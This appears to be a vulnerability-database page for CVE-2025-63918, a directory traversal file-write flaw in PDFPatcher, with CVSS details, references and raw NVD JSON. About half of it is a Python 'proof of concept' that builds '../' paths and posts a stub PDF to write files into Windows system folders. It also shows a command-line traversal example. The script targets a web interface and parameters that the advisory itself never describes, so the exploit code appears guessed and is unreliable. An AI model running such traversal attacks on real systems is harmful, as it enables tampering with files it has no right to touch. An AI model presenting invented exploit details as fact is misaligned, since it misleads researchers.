Security Vulnerability Report
CVE-2025-63918 CVSS 6.2 MEDIUM

CVE-2025-63918

Published: 2025-11-17 17:15:51
Last Modified: 2026-01-08 17:18:52

Description

PDFPatcher executable does not validate user-supplied file paths, allowing directory traversal attacks in which attackers can upload arbitrary files to arbitrary locations.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:cnblogs:pdfpatcher:*:*:*:*:*:*:*:* - VULNERABLE
PDFPatcher < fixed version (the NVD record below gives versionEndExcluding 1.1.3.4663)
All PDFPatcher versions that have not applied the security patch are affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63918 PoC - PDFPatcher Directory Traversal File Write

This PoC demonstrates how an attacker can exploit the directory traversal
vulnerability in PDFPatcher to write files to arbitrary locations.
"""

import sys

import requests


def generate_malicious_pdf():
    """Generate a minimal malicious PDF for exploitation"""
    return b'%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n'


def create_traversal_payload(target_path, filename):
    """
    Create a directory traversal payload to write files outside intended directory

    Args:
        target_path: The absolute path where we want to write the file
        filename: The name of the file to create

    Returns:
        Traversal path string that bypasses path validation
    """
    # Calculate how many ../ we need based on the expected base directory
    # Adjust the number of ../ based on actual application behavior
    base_depth = 3  # Example: application expects files in ./output/
    traversal = '../' * base_depth

    # Construct the full malicious path
    malicious_path = f"{traversal}{target_path}/{filename}"
    return malicious_path


def exploit_pdfpatcher(target_url, output_path, filename):
    """
    Exploit the directory traversal vulnerability

    Args:
        target_url: URL of the vulnerable PDFPatcher instance
        output_path: Target directory path (e.g., /tmp, /var/www)
        filename: Filename to write
    """
    payload_path = create_traversal_payload(output_path, filename)
    malicious_pdf = generate_malicious_pdf()

    # Prepare the exploit request
    files = {
        'file': ('malicious.pdf', malicious_pdf, 'application/pdf')
    }
    data = {
        'action': 'export_image',
        'output_path': payload_path,  # Malicious traversal path
        'format': 'png'
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Payload path: {payload_path}")
    print(f"[*] Attempting to write: {output_path}/{filename}")

    try:
        response = requests.post(target_url, files=files, data=data, timeout=30)
        if response.status_code == 200:
            print("[+] File write successful!")
            print(f"[+] Check {output_path}/{filename}")
            return True
        else:
            print(f"[-] Exploitation failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def local_exploit():
    """
    Local exploitation scenario - when attacker has local access
    """
    print("[*] Local exploitation scenario")
    print("[*] Attacker can manipulate file paths via command line or GUI")

    # Example: PDFPatcher command line usage
    cmd = """
    # Normal usage (intended):
    PDFPatcher.exe -export-images input.pdf -o ./output/

    # Exploitation (malicious):
    PDFPatcher.exe -export-images input.pdf -o ../../../../Windows/System32/
    # This writes files to System32 directory instead of intended output folder
    """
    print(cmd)


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-63918 - PDFPatcher Directory Traversal PoC")
    print("=" * 60)

    # Local exploitation example
    local_exploit()

    # Remote exploitation (if web interface exists)
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_pdfpatcher(target, "C:\\Windows\\Temp", "evil.txt")

References

https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/DirectoryTraversal-ImageExport.md (Exploit, Third Party Advisory)
https://github.com/wmjordan/PDFPatcher (Product)
https://www.cnblogs.com/pdfpatcher (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63918", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:51.333", "lastModified": "2026-01-08T17:18:51.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFPatcher executable does not validate user-supplied file paths, allowing directory traversal attacks allowing attackers to upload arbitrary files to arbitrary locations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cnblogs:pdfpatcher:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.3.4663", "matchCriteriaId": "36646C19-FE15-43AE-9E5F-68AAFA228774"}]}]}], "references": [{"url": "https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/DirectoryTraversal-ImageExport.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/wmjordan/PDFPatcher", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cnblogs.com/pdfpatcher", "source": "[email protected]", "tags": ["Product"]}]}}